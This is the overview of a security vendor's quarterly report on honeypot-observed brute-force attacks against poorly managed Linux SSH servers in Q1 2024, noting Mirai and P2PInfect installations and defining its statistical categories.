Overview

 

AhnLab SEcurity intelligence Center (ASEC) uses honeypots to respond to and categorize brute force or dictionary attacks targeting poorly managed Linux SSH servers. This report will cover the status of attack sources identified in the first quarter of 2024 based on logs, as well as statistics on attacks performed by these attack sources. Furthermore, the malware used in each attack will be categorized with a summary of the statistical details.

 

Statistics

 

1. Status of Attacks on Linux SSH Servers

 

The following image shows statistics on attacks against Linux SSH servers identified through AhnLab’s honeypot logs in the first quarter of 2024. A notable fact about Q1 2024 is that multiple attack sources were identified, most of them installing Mirai. Also, attacks involving P2PInfect (worm malware) identified in late 2023 continue to be detected.

 

Figure 1. Attacks against Linux SSH servers in Q1, 2024

The “Attack source” category refers to the number of systems used in attacks by malware or threat actors: in other words, systems where a history of actual malware installation commands being executed has been confirmed. ASEC honeypots collect logs related to attacks targeting poorly managed Linux SSH servers. In this context, poorly managed environments refer to environments with vulnerabilities to brute force or dictionary attacks due to inadequately managed account credentials. If successful login occurs on inadequately managed systems, the malware or threat actor can gain control over those systems.

The “Attack status” shows the number of times threat actors or malware attacked the system. Attacks on poorly managed Linux SSH servers typically begin with scanning, and most attack attempts end after the account credentials are obtained through brute force or dictionary attacks, or after the subsequent phase of collecting basic information. This report will summarize the statistical information based on cases that go beyond this stage and have confirmed logs of malware being installed.